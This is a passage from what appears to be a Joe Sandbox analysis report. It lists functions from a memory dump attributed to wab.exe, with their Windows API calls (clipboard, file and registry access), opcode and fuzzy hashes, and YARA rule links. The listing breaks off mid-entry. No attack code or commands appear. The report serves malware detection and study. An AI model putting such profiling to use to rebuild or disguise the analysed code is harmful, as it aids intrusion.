                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                    Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                    Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                    Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: EnumNamesResource
                    • String ID:
                    • API String ID: 3334572018-0
                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                    Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                    Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                    Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                    Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                    Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                    • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                    • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                    • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                    Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                    • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                    Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004095FC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                      • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                      • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                    • String ID:
                    • API String ID: 3655998216-0
                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                    Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00445426
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                    • String ID:
                    • API String ID: 1828521557-0
                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                    Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                    • memcpy.MSVCRT ref: 00406942
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@FilePointermemcpy
                    • String ID:
                    • API String ID: 609303285-0
                    • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                    • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                    Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID:
                    • API String ID: 2081463915-0
                    • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                    • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                    Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$CloseCreateErrorHandleLastRead
                    • String ID:
                    • API String ID: 2136311172-0
                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                    Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@
                    • String ID:
                    • API String ID: 1936579350-0
                    • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                    • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

                    Non-executed Functions

                    Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • EmptyClipboard.USER32 ref: 004098EC
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                    • GlobalFix.KERNEL32(00000000), ref: 00409927
                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                    • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                    • GetLastError.KERNEL32 ref: 0040995D
                    • CloseHandle.KERNEL32(?), ref: 00409969
                    • GetLastError.KERNEL32 ref: 00409974
                    • CloseClipboard.USER32 ref: 0040997D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                    • String ID:
                    • API String ID: 2565263379-0
                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                    Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadMessageProc
                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                    • API String ID: 2780580303-317687271
                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                    Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • EmptyClipboard.USER32 ref: 00409882
                    • wcslen.MSVCRT ref: 0040988F
                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                    • GlobalFix.KERNEL32(00000000), ref: 004098AC
                    • memcpy.MSVCRT ref: 004098B5
                    • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                    • CloseClipboard.USER32 ref: 004098D7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                    • String ID:
                    • API String ID: 2014503067-0
                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                    Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32 ref: 004182D7
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                    • LocalFree.KERNEL32(?), ref: 00418342
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                    • String ID: OsError 0x%x (%u)
                    • API String ID: 403622227-2664311388
                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                    Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                    • OpenClipboard.USER32(?), ref: 00411878
                    • GetLastError.KERNEL32 ref: 0041188D
                    • DeleteFileW.KERNEL32(?), ref: 004118AC
                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                      • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                      • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                    • String ID:
                    • API String ID: 1203541146-0
                    • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                    • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                    • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                    • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                    Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID:
                    • API String ID: 1865533344-0
                    • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                    • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                    Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Version
                    • String ID:
                    • API String ID: 1889659487-0
                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                    Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: NtdllProc_Window
                    • String ID:
                    • API String ID: 4255912815-0
                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                    Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                    Download Yara Rule
                    APIs
                    • _wcsicmp.MSVCRT ref: 004022A6
                    • _wcsicmp.MSVCRT ref: 004022D7
                    • _wcsicmp.MSVCRT ref: 00402305
                    • _wcsicmp.MSVCRT ref: 00402333
